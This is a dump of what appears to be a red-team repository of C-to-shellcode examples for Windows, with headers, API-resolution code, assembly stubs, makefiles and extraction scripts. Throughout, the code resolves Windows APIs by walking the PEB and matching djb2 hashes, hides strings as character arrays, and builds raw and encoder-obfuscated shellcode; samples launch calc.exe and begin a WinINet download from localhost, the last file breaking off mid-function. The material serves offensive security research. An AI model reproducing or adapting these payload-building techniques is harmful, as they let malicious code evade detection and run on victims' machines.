├── CreateProcess ├── APIResolve.h ├── ApiResolve.c ├── CreateProcess.bin ├── CreateProcess.bin.sgn ├── CreateProcess.c ├── adjuststack.asm ├── extract.sh └── makefile ├── DownloadString_Syscalls ├── APIResolve.h ├── ApiResolve.c ├── DownloadString_Syscall.bin ├── DownloadString_Syscall.bin.sgn ├── DownloadString_Syscall.c ├── Syscalls.h ├── adjuststack.asm ├── extract.sh ├── makefile └── syscalls-asm.h ├── HelloWorld ├── APIResolve.h ├── ApiResolve.c ├── HelloWorld.bin ├── HelloWorld.bin.sgn ├── HelloWorld.c ├── adjuststack.asm ├── extract.sh └── makefile ├── Loaders └── loaderbuilder.py ├── README.md └── WMI_get_pid_service_evt ├── APIResolve.h ├── ApiResolve.c ├── WMI_get_pid_service_evt.bin ├── WMI_get_pid_service_evt.c ├── adjuststack.asm ├── extract.sh └── makefile /CreateProcess/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_CLOSEHANDLE 0x3870ca07 14 | #define HASH_CREATEPROCESSA 0xaeb52e19 15 | 16 | typedef BOOL(WINAPI* CLOSEHANDLE)(HANDLE); 17 | typedef BOOL(WINAPI* CREATEPROCESSA)(LPCSTR, LPSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCSTR, LPSTARTUPINFOA, LPPROCESS_INFORMATION); 18 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 19 | 20 | typedef struct _UNICODE_STR { 21 | USHORT Length; 22 | USHORT MaximumLength; 23 | PWSTR pBuffer; 24 | } UNICODE_STR, * PUNICODE_STR; 25 | 26 | typedef struct _PEB_LDR_DATA 27 | { 28 | DWORD dwLength; 29 | DWORD dwInitialized; 30 | LPVOID lpSsHandle; 31 | LIST_ENTRY InLoadOrderModuleList; 32 | LIST_ENTRY InMemoryOrderModuleList; 33 | LIST_ENTRY InInitializationOrderModuleList; 34 | LPVOID lpEntryInProgress; 35 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 36 | 37 | typedef struct _LDR_DATA_TABLE_ENTRY 38 | { 39 | LIST_ENTRY InMemoryOrderModuleList; 40 | LIST_ENTRY InInitializationOrderModuleList; 41 | PVOID DllBase; 42 | PVOID EntryPoint; 43 | ULONG SizeOfImage; 44 | UNICODE_STR FullDllName; 45 | UNICODE_STR BaseDllName; 46 | ULONG Flags; 47 | SHORT LoadCount; 48 | SHORT TlsIndex; 49 | LIST_ENTRY HashTableEntry; 50 | ULONG TimeDateStamp; 51 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 52 | 53 | typedef struct _PEB_FREE_BLOCK 54 | { 55 | struct _PEB_FREE_BLOCK* pNext; 56 | DWORD dwSize; 57 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 58 | 59 | typedef struct __PEB 60 | { 61 | BYTE bInheritedAddressSpace; 62 | BYTE bReadImageFileExecOptions; 63 | BYTE bBeingDebugged; 64 | BYTE bSpareBool; 65 | LPVOID lpMutant; 66 | LPVOID lpImageBaseAddress; 67 | PPEB_LDR_DATA pLdr; 68 | LPVOID lpProcessParameters; 69 | LPVOID lpSubSystemData; 70 | LPVOID lpProcessHeap; 71 | PRTL_CRITICAL_SECTION pFastPebLock; 72 | LPVOID lpFastPebLockRoutine; 73 | LPVOID lpFastPebUnlockRoutine; 74 | DWORD dwEnvironmentUpdateCount; 75 | LPVOID lpKernelCallbackTable; 76 | DWORD dwSystemReserved; 77 | DWORD dwAtlThunkSListPtr32; 78 | PPEB_FREE_BLOCK pFreeList; 79 | DWORD dwTlsExpansionCounter; 80 | LPVOID lpTlsBitmap; 81 | DWORD dwTlsBitmapBits[2]; 82 | LPVOID lpReadOnlySharedMemoryBase; 83 | LPVOID lpReadOnlySharedMemoryHeap; 84 | LPVOID lpReadOnlyStaticServerData; 85 | LPVOID lpAnsiCodePageData; 86 | LPVOID lpOemCodePageData; 87 | LPVOID lpUnicodeCaseTableData; 88 | DWORD dwNumberOfProcessors; 89 | DWORD dwNtGlobalFlag; 90 | LARGE_INTEGER liCriticalSectionTimeout; 91 | DWORD dwHeapSegmentReserve; 92 | DWORD dwHeapSegmentCommit; 93 | DWORD dwHeapDeCommitTotalFreeThreshold; 94 | DWORD dwHeapDeCommitFreeBlockThreshold; 95 | DWORD dwNumberOfHeaps; 96 | DWORD dwMaximumNumberOfHeaps; 97 | LPVOID lpProcessHeaps; 98 | LPVOID lpGdiSharedHandleTable; 99 | LPVOID lpProcessStarterHelper; 100 | DWORD dwGdiDCAttributeList; 101 | LPVOID lpLoaderLock; 102 | DWORD dwOSMajorVersion; 103 | DWORD dwOSMinorVersion; 104 | WORD wOSBuildNumber; 105 | WORD wOSCSDVersion; 106 | DWORD dwOSPlatformId; 107 | DWORD dwImageSubsystem; 108 | DWORD dwImageSubsystemMajorVersion; 109 | DWORD dwImageSubsystemMinorVersion; 110 | DWORD dwImageProcessAffinityMask; 111 | DWORD dwGdiHandleBuffer[34]; 112 | LPVOID lpPostProcessInitRoutine; 113 | LPVOID lpTlsExpansionBitmap; 114 | DWORD dwTlsExpansionBitmapBits[32]; 115 | DWORD dwSessionId; 116 | ULARGE_INTEGER liAppCompatFlags; 117 | ULARGE_INTEGER liAppCompatFlagsUser; 118 | LPVOID lppShimData; 119 | LPVOID lpAppCompatInfo; 120 | UNICODE_STR usCSDVersion; 121 | LPVOID lpActivationContextData; 122 | LPVOID lpProcessAssemblyStorageMap; 123 | LPVOID lpSystemDefaultActivationContextData; 124 | LPVOID lpSystemAssemblyStorageMap; 125 | DWORD dwMinimumStackCommit; 126 | } _PEB, * _PPEB; 127 | -------------------------------------------------------------------------------- /CreateProcess/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | // No need for additional dlls in this sample 44 | 45 | return ptr_loaded_dll; 46 | 47 | } 48 | 49 | static uint64_t 50 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 51 | 52 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 53 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 54 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 55 | 56 | uint32_t* ptr_exportadrtable = 0x00; 57 | uint32_t* ptr_namepointertable = 0x00; 58 | uint16_t* ptr_ordinaltable = 0x00; 59 | 60 | uint32_t idx_functions = 0x00; 61 | 62 | unsigned char* ptr_function_name = NULL; 63 | 64 | 65 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 66 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 67 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 68 | 69 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 70 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 71 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 72 | 73 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 74 | 75 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 76 | if (djb2(ptr_function_name) == function_hash) { 77 | WORD nameord = ptr_ordinaltable[idx_functions]; 78 | DWORD rva = ptr_exportadrtable[nameord]; 79 | return dll_base + rva; 80 | } 81 | 82 | } 83 | 84 | return 0; 85 | } 86 | 87 | 88 | 89 | static uint64_t 90 | getDllBase(unsigned long dll_hash) { 91 | 92 | _PPEB ptr_peb = NULL; 93 | PPEB_LDR_DATA ptr_ldr_data = NULL; 94 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 95 | PUNICODE_STR dll_name = NULL; 96 | 97 | ptr_peb = (_PEB*)__readgsqword(0x60); 98 | ptr_ldr_data = ptr_peb->pLdr; 99 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 100 | 101 | do{ 102 | 103 | dll_name = &ptr_module_entry->BaseDllName; 104 | 105 | if (dll_name->pBuffer == NULL) 106 | return 0; 107 | 108 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 109 | return (uint64_t)ptr_module_entry->DllBase; 110 | 111 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 112 | 113 | } while (ptr_module_entry != ptr_start_module); 114 | 115 | return 0; 116 | 117 | } 118 | 119 | static unsigned long 120 | djb2(unsigned char* str) 121 | { 122 | unsigned long hash = 5381; 123 | int c; 124 | 125 | while ((c = *str++)) 126 | hash = ((hash << 5) + hash) + c; 127 | 128 | return hash; 129 | } 130 | 131 | unsigned long 132 | unicode_djb2(const wchar_t* str) 133 | { 134 | 135 | unsigned long hash = 5381; 136 | DWORD val; 137 | 138 | while (*str != 0) { 139 | val = (DWORD)*str++; 140 | hash = ((hash << 5) + hash) + val; 141 | } 142 | 143 | return hash; 144 | 145 | } 146 | 147 | static WCHAR* 148 | toLower(WCHAR *str) 149 | { 150 | 151 | WCHAR* start = str; 152 | 153 | while (*str) { 154 | 155 | if (*str <= L'Z' && *str >= 'A') { 156 | *str += 32; 157 | } 158 | 159 | str += 1; 160 | 161 | } 162 | 163 | return start; 164 | 165 | } -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/CreateProcess/CreateProcess.bin -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.bin.sgn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/CreateProcess/CreateProcess.bin.sgn -------------------------------------------------------------------------------- /CreateProcess/CreateProcess.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | #define FAIL 0 4 | #define SUCCESS 1 5 | 6 | #ifdef _DEBUG 7 | int 8 | main(void) { 9 | #else 10 | int 11 | go(void) { 12 | #endif 13 | 14 | uint64_t _CloseHandle = getFunctionPtr(HASH_KERNEL32, HASH_CLOSEHANDLE); 15 | uint64_t _CreateProcessA = getFunctionPtr(HASH_KERNEL32, HASH_CREATEPROCESSA); 16 | 17 | if (_CloseHandle == 0x00 || _CreateProcessA == 0x00) 18 | return FAIL; 19 | 20 | STARTUPINFOA si; 21 | PROCESS_INFORMATION pi; 22 | 23 | DWORD dw_success = FAIL; 24 | 25 | char file[] = { 'C', ':', '\\', 'W', 'i', 'n', 'd', 'o', 'w', 's', '\\', 'S', 'y','s','t','e', 'm','3','2','\\', 'c', 'a', 'l', 'c', '.', 'e', 'x', 'e', 0x00 }; 26 | 27 | for (uint8_t i = 0; i < sizeof(si); i++) 28 | *((uint8_t*)(&si) + i) = 0x00; 29 | 30 | for (uint8_t i = 0; i < sizeof(pi); i++) 31 | *((uint8_t*)(&pi) + i) = 0x00; 32 | 33 | si.cb = sizeof(si); 34 | 35 | dw_success = ((CREATEPROCESSA)_CreateProcessA)(0, file, 0, 0, TRUE, 0, 0, 0, &si, &pi); 36 | if (dw_success == FAIL) 37 | goto cleanup; 38 | 39 | dw_success = SUCCESS; 40 | 41 | cleanup: 42 | ((CLOSEHANDLE)_CloseHandle)(pi.hThread); 43 | ((CLOSEHANDLE)_CloseHandle)(pi.hProcess); 44 | 45 | 46 | return dw_success; 47 | 48 | } -------------------------------------------------------------------------------- /CreateProcess/adjuststack.asm: -------------------------------------------------------------------------------- 1 | ; Based on http://www.exploit-monday.com/2013/08/writing-optimized-windows-shellcode-in-c.html and https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | 3 | extern go 4 | global alignstack 5 | 6 | segment .text 7 | 8 | alignstack: 9 | push rsi 10 | mov rsi, rsp 11 | and rsp, 0FFFFFFFFFFFFFFF0h 12 | sub rsp, 020h 13 | call go 14 | mov rsp, rsi 15 | pop rsi 16 | ret 17 | -------------------------------------------------------------------------------- /CreateProcess/extract.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | for i in $(objdump -d CreateProcess.exe | grep "^ " | cut -f2); do echo -e -n "\x$i"; done >> CreateProcess.bin 3 | -------------------------------------------------------------------------------- /CreateProcess/makefile: -------------------------------------------------------------------------------- 1 | # based on https://bruteratel.com/research/feature-update/2021/01/30/OBJEXEC/ 2 | make: 3 | nasm -f win64 adjuststack.asm -o adjuststack.o 4 | x86_64-w64-mingw32-gcc ApiResolve.c -Wall -m64 -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o ApiResolve.o -Wl,--no-seh 5 | x86_64-w64-mingw32-gcc CreateProcess.c -Wall -m64 -masm=intel -ffunction-sections -fno-asynchronous-unwind-tables -nostdlib -fno-ident -O2 -c -o Createprocess.o -Wl,--no-seh 6 | x86_64-w64-mingw32-ld -s adjuststack.o ApiResolve.o Createprocess.o -o CreateProcess.exe 7 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/APIResolve.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include "windows.h" 5 | 6 | #include "wininet.h" 7 | 8 | uint64_t getFunctionPtr(unsigned long, unsigned long); 9 | 10 | // ---- KERNEL32 ---- 11 | #define HASH_KERNEL32 0x7040ee75 12 | #define HASH_LOADLIBRARYA 0x5fbff0fb 13 | #define HASH_VIRTUALALLOC 0x382c0f97 14 | #define HASH_VIRTUALFREE 0x668fcf2e 15 | 16 | typedef HMODULE(WINAPI* LOADLIBRARYA)(LPCSTR); 17 | typedef LPVOID(WINAPI* VIRTUALALLOC)(LPVOID, SIZE_T, DWORD, DWORD); 18 | typedef BOOL(WINAPI* VIRTUALFREE)(LPVOID, SIZE_T, DWORD); 19 | 20 | // ---- USER32 ---- 21 | #define HASH_USER32 0x5a6bd3f3 22 | #define HASH_MESSAGEBOXA 0x384f14b4 23 | 24 | typedef int(WINAPI* MESSAGEBOXA)(HWND, LPCSTR, LPCSTR, UINT); 25 | 26 | // ---- Wininet.dll ---- 27 | #define HASH_WININET 0x8dbd9c6d 28 | #define HASH_INTERNETOPENA 0xf4ad70a1 29 | #define HASH_INTERNETREADFILE 0xfb4f8eaa 30 | #define HASH_INTERNETCLOSEHANDLE 0x4241bef0 31 | #define HASH_INTERNETCONNECTA 0x44536159 32 | #define HASH_HTTPOPENREQUESTA 0xf0fcb9e1 33 | #define HASH_HTTPSENDREQUESTA 0x915115b9 34 | 35 | typedef HINTERNET(WINAPI* INTERNETOPENA)(LPCSTR, DWORD, LPCSTR, LPCSTR, DWORD); 36 | typedef BOOL(WINAPI* INTERNETREADFILE)(HINTERNET, LPVOID, DWORD, LPDWORD); 37 | typedef BOOL(WINAPI* INTERNETCLOSEHANDLE)(HINTERNET); 38 | typedef HINTERNET(WINAPI* INTERNETCONNECTA)(HINTERNET, LPCSTR, INTERNET_PORT, LPCSTR, LPCSTR, DWORD, DWORD, DWORD_PTR); 39 | typedef HINTERNET(WINAPI* HTTPOPENREQUESTA)(HINTERNET, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR, LPCTSTR*, DWORD, DWORD_PTR); 40 | typedef BOOL(WINAPI* HTTPSENDREQUESTA)(HINTERNET, LPCSTR, DWORD, LPVOID, DWORD); 41 | 42 | typedef PCSTR(WINAPI* STRSTRA)(PCSTR, PCSTR); 43 | 44 | typedef struct _UNICODE_STR { 45 | USHORT Length; 46 | USHORT MaximumLength; 47 | PWSTR pBuffer; 48 | } UNICODE_STR, * PUNICODE_STR; 49 | 50 | typedef struct _PEB_LDR_DATA 51 | { 52 | DWORD dwLength; 53 | DWORD dwInitialized; 54 | LPVOID lpSsHandle; 55 | LIST_ENTRY InLoadOrderModuleList; 56 | LIST_ENTRY InMemoryOrderModuleList; 57 | LIST_ENTRY InInitializationOrderModuleList; 58 | LPVOID lpEntryInProgress; 59 | } PEB_LDR_DATA, * PPEB_LDR_DATA; 60 | 61 | typedef struct _LDR_DATA_TABLE_ENTRY 62 | { 63 | LIST_ENTRY InMemoryOrderModuleList; 64 | LIST_ENTRY InInitializationOrderModuleList; 65 | PVOID DllBase; 66 | PVOID EntryPoint; 67 | ULONG SizeOfImage; 68 | UNICODE_STR FullDllName; 69 | UNICODE_STR BaseDllName; 70 | ULONG Flags; 71 | SHORT LoadCount; 72 | SHORT TlsIndex; 73 | LIST_ENTRY HashTableEntry; 74 | ULONG TimeDateStamp; 75 | } LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY; 76 | 77 | typedef struct _PEB_FREE_BLOCK 78 | { 79 | struct _PEB_FREE_BLOCK* pNext; 80 | DWORD dwSize; 81 | } PEB_FREE_BLOCK, * PPEB_FREE_BLOCK; 82 | 83 | typedef struct __PEB 84 | { 85 | BYTE bInheritedAddressSpace; 86 | BYTE bReadImageFileExecOptions; 87 | BYTE bBeingDebugged; 88 | BYTE bSpareBool; 89 | LPVOID lpMutant; 90 | LPVOID lpImageBaseAddress; 91 | PPEB_LDR_DATA pLdr; 92 | LPVOID lpProcessParameters; 93 | LPVOID lpSubSystemData; 94 | LPVOID lpProcessHeap; 95 | PRTL_CRITICAL_SECTION pFastPebLock; 96 | LPVOID lpFastPebLockRoutine; 97 | LPVOID lpFastPebUnlockRoutine; 98 | DWORD dwEnvironmentUpdateCount; 99 | LPVOID lpKernelCallbackTable; 100 | DWORD dwSystemReserved; 101 | DWORD dwAtlThunkSListPtr32; 102 | PPEB_FREE_BLOCK pFreeList; 103 | DWORD dwTlsExpansionCounter; 104 | LPVOID lpTlsBitmap; 105 | DWORD dwTlsBitmapBits[2]; 106 | LPVOID lpReadOnlySharedMemoryBase; 107 | LPVOID lpReadOnlySharedMemoryHeap; 108 | LPVOID lpReadOnlyStaticServerData; 109 | LPVOID lpAnsiCodePageData; 110 | LPVOID lpOemCodePageData; 111 | LPVOID lpUnicodeCaseTableData; 112 | DWORD dwNumberOfProcessors; 113 | DWORD dwNtGlobalFlag; 114 | LARGE_INTEGER liCriticalSectionTimeout; 115 | DWORD dwHeapSegmentReserve; 116 | DWORD dwHeapSegmentCommit; 117 | DWORD dwHeapDeCommitTotalFreeThreshold; 118 | DWORD dwHeapDeCommitFreeBlockThreshold; 119 | DWORD dwNumberOfHeaps; 120 | DWORD dwMaximumNumberOfHeaps; 121 | LPVOID lpProcessHeaps; 122 | LPVOID lpGdiSharedHandleTable; 123 | LPVOID lpProcessStarterHelper; 124 | DWORD dwGdiDCAttributeList; 125 | LPVOID lpLoaderLock; 126 | DWORD dwOSMajorVersion; 127 | DWORD dwOSMinorVersion; 128 | WORD wOSBuildNumber; 129 | WORD wOSCSDVersion; 130 | DWORD dwOSPlatformId; 131 | DWORD dwImageSubsystem; 132 | DWORD dwImageSubsystemMajorVersion; 133 | DWORD dwImageSubsystemMinorVersion; 134 | DWORD dwImageProcessAffinityMask; 135 | DWORD dwGdiHandleBuffer[34]; 136 | LPVOID lpPostProcessInitRoutine; 137 | LPVOID lpTlsExpansionBitmap; 138 | DWORD dwTlsExpansionBitmapBits[32]; 139 | DWORD dwSessionId; 140 | ULARGE_INTEGER liAppCompatFlags; 141 | ULARGE_INTEGER liAppCompatFlagsUser; 142 | LPVOID lppShimData; 143 | LPVOID lpAppCompatInfo; 144 | UNICODE_STR usCSDVersion; 145 | LPVOID lpActivationContextData; 146 | LPVOID lpProcessAssemblyStorageMap; 147 | LPVOID lpSystemDefaultActivationContextData; 148 | LPVOID lpSystemAssemblyStorageMap; 149 | DWORD dwMinimumStackCommit; 150 | } _PEB, * _PPEB; 151 | -------------------------------------------------------------------------------- /DownloadString_Syscalls/ApiResolve.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | 3 | static uint64_t getDllBase(unsigned long); 4 | static uint64_t loadDll(unsigned long); 5 | static uint64_t parseHdrForPtr(uint64_t, unsigned long); 6 | 7 | static unsigned long djb2(unsigned char*); 8 | static unsigned long unicode_djb2(const wchar_t* str); 9 | static WCHAR* toLower(WCHAR* str); 10 | 11 | uint64_t 12 | getFunctionPtr(unsigned long dll_hash, unsigned long function_hash) { 13 | 14 | uint64_t dll_base = 0x00; 15 | uint64_t ptr_function = 0x00; 16 | 17 | dll_base = getDllBase(dll_hash); 18 | if (dll_base == 0) { 19 | dll_base = loadDll(dll_hash); 20 | if (dll_base == 0) 21 | return 0; 22 | } 23 | 24 | ptr_function = parseHdrForPtr(dll_base, function_hash); 25 | 26 | return ptr_function; 27 | } 28 | 29 | static uint64_t 30 | loadDll(unsigned long dll_hash) { 31 | 32 | uint64_t kernel32_base = 0x00; 33 | uint64_t fptr_loadLibary = 0x00; 34 | uint64_t ptr_loaded_dll = 0x00; 35 | 36 | kernel32_base = getDllBase(HASH_KERNEL32); 37 | if (kernel32_base == 0x00) 38 | return 0; 39 | 40 | fptr_loadLibary = parseHdrForPtr(kernel32_base, HASH_LOADLIBRARYA); 41 | if (fptr_loadLibary == 0x00) 42 | return 0; 43 | 44 | if (dll_hash == HASH_USER32) { 45 | char dll_name[] = { 'U', 's', 'e', 'r', '3' ,'2' ,'.', 'd', 'l', 'l', 0x00 }; 46 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 47 | } else if (dll_hash == HASH_WININET) { 48 | char dll_name[] = { 'W', 'i', 'n', 'i', 'n', 'e', 't', '.', 'd','l','l',0x00 }; 49 | ptr_loaded_dll = (uint64_t)((LOADLIBRARYA)fptr_loadLibary)(dll_name); 50 | } 51 | 52 | return ptr_loaded_dll; 53 | 54 | } 55 | 56 | static uint64_t 57 | parseHdrForPtr(uint64_t dll_base, unsigned long function_hash) { 58 | 59 | PIMAGE_NT_HEADERS nt_hdrs = NULL; 60 | PIMAGE_DATA_DIRECTORY data_dir= NULL; 61 | PIMAGE_EXPORT_DIRECTORY export_dir= NULL; 62 | 63 | uint32_t* ptr_exportadrtable = 0x00; 64 | uint32_t* ptr_namepointertable = 0x00; 65 | uint16_t* ptr_ordinaltable = 0x00; 66 | 67 | uint32_t idx_functions = 0x00; 68 | 69 | unsigned char* ptr_function_name = NULL; 70 | 71 | 72 | nt_hdrs = (PIMAGE_NT_HEADERS)(dll_base + (uint64_t)((PIMAGE_DOS_HEADER)(size_t)dll_base)->e_lfanew); 73 | data_dir = (PIMAGE_DATA_DIRECTORY)&nt_hdrs->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT]; 74 | export_dir = (PIMAGE_EXPORT_DIRECTORY)(dll_base + (uint64_t)data_dir->VirtualAddress); 75 | 76 | ptr_exportadrtable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfFunctions); 77 | ptr_namepointertable = (uint32_t*)(dll_base + (uint64_t)export_dir->AddressOfNames); 78 | ptr_ordinaltable = (uint16_t*)(dll_base + (uint64_t)export_dir->AddressOfNameOrdinals); 79 | 80 | for(idx_functions = 0; idx_functions < export_dir->NumberOfNames; idx_functions++){ 81 | 82 | ptr_function_name = (unsigned char*)dll_base + (ptr_namepointertable[idx_functions]); 83 | if (djb2(ptr_function_name) == function_hash) { 84 | WORD nameord = ptr_ordinaltable[idx_functions]; 85 | DWORD rva = ptr_exportadrtable[nameord]; 86 | return dll_base + rva; 87 | } 88 | 89 | } 90 | 91 | return 0; 92 | } 93 | 94 | 95 | 96 | static uint64_t 97 | getDllBase(unsigned long dll_hash) { 98 | 99 | _PPEB ptr_peb = NULL; 100 | PPEB_LDR_DATA ptr_ldr_data = NULL; 101 | PLDR_DATA_TABLE_ENTRY ptr_module_entry = NULL, ptr_start_module = NULL; 102 | PUNICODE_STR dll_name = NULL; 103 | 104 | ptr_peb = (_PEB*)__readgsqword(0x60); 105 | ptr_ldr_data = ptr_peb->pLdr; 106 | ptr_module_entry = ptr_start_module = (PLDR_DATA_TABLE_ENTRY)ptr_ldr_data->InMemoryOrderModuleList.Flink; 107 | 108 | do{ 109 | 110 | dll_name = &ptr_module_entry->BaseDllName; 111 | 112 | if (dll_name->pBuffer == NULL) 113 | return 0; 114 | 115 | if (unicode_djb2(toLower(dll_name->pBuffer)) == dll_hash) 116 | return (uint64_t)ptr_module_entry->DllBase; 117 | 118 | ptr_module_entry = (PLDR_DATA_TABLE_ENTRY)ptr_module_entry->InMemoryOrderModuleList.Flink; 119 | 120 | } while (ptr_module_entry != ptr_start_module); 121 | 122 | return 0; 123 | 124 | } 125 | 126 | static unsigned long 127 | djb2(unsigned char* str) 128 | { 129 | unsigned long hash = 5381; 130 | int c; 131 | 132 | while ((c = *str++)) 133 | hash = ((hash << 5) + hash) + c; 134 | 135 | return hash; 136 | } 137 | 138 | unsigned long 139 | unicode_djb2(const wchar_t* str) 140 | { 141 | 142 | unsigned long hash = 5381; 143 | DWORD val; 144 | 145 | while (*str != 0) { 146 | val = (DWORD)*str++; 147 | hash = ((hash << 5) + hash) + val; 148 | } 149 | 150 | return hash; 151 | 152 | } 153 | 154 | static WCHAR* 155 | toLower(WCHAR *str) 156 | { 157 | 158 | WCHAR* start = str; 159 | 160 | while (*str) { 161 | 162 | if (*str <= L'Z' && *str >= 'A') { 163 | *str += 32; 164 | } 165 | 166 | str += 1; 167 | 168 | } 169 | 170 | return start; 171 | 172 | } -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/DownloadString_Syscalls/DownloadString_Syscall.bin -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.bin.sgn: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/thefLink/C-To-Shellcode-Examples/0e8f1007f9d61200dde2103258722b871504f18e/DownloadString_Syscalls/DownloadString_Syscall.bin.sgn -------------------------------------------------------------------------------- /DownloadString_Syscalls/DownloadString_Syscall.c: -------------------------------------------------------------------------------- 1 | #include "APIResolve.h" 2 | #ifndef _DEBUG 3 | #include "Syscalls.h" 4 | #endif 5 | 6 | #define FAIL 0 7 | #define SUCCESS 1 8 | 9 | #define MAX_BUFFER 512 * 512 10 | 11 | #ifdef _DEBUG 12 | int 13 | main(void) { 14 | #else 15 | int 16 | go(void) { 17 | #endif 18 | 19 | uint64_t _InternetCloseHandle = getFunctionPtr(HASH_WININET, HASH_INTERNETCLOSEHANDLE); 20 | uint64_t _InternetOpenA = getFunctionPtr(HASH_WININET, HASH_INTERNETOPENA); 21 | uint64_t _InternetConnectA = getFunctionPtr(HASH_WININET, HASH_INTERNETCONNECTA); 22 | uint64_t _HttpOpenRequestA = getFunctionPtr(HASH_WININET, HASH_HTTPOPENREQUESTA); 23 | uint64_t _InternetReadFile = getFunctionPtr(HASH_WININET, HASH_INTERNETREADFILE); 24 | uint64_t _HttpSendRequestA = getFunctionPtr(HASH_WININET, HASH_HTTPSENDREQUESTA); 25 | uint64_t _VirtualFree = getFunctionPtr(HASH_KERNEL32, HASH_VIRTUALFREE); 26 | uint64_t _MessageBoxA = getFunctionPtr(HASH_USER32, HASH_MESSAGEBOXA); 27 | 28 | if ( _InternetCloseHandle == 0x00 || _InternetOpenA == 0x00 || _InternetConnectA == 0x00 || _HttpOpenRequestA == 0x00 || _InternetReadFile == 0x00 || _VirtualFree == 0x00 || _HttpSendRequestA == 0x00 || _MessageBoxA == 0x00) 29 | return FAIL; 30 | 31 | char hostname[] = { '1', '2', '7', '.', '0','.', '0', '.', '1', 0x00 }; 32 | char endpoint[] = { 'x', 0x00 }; 33 | uint32_t port = 80; 34 | HINTERNET h_session = NULL, h_connect = NULL, h_request = NULL; 35 | DWORD dw_read = 0, dw_read_total = 0, dw_success = FAIL; 36 | char method[] = { 'G', 'E', 'T', 0x00 }; 37 | 38 | SIZE_T mem_size = MAX_BUFFER; 39 | LPVOID ptr_memory = NULL; 40 | 41 | #ifndef _DEBUG 42 | 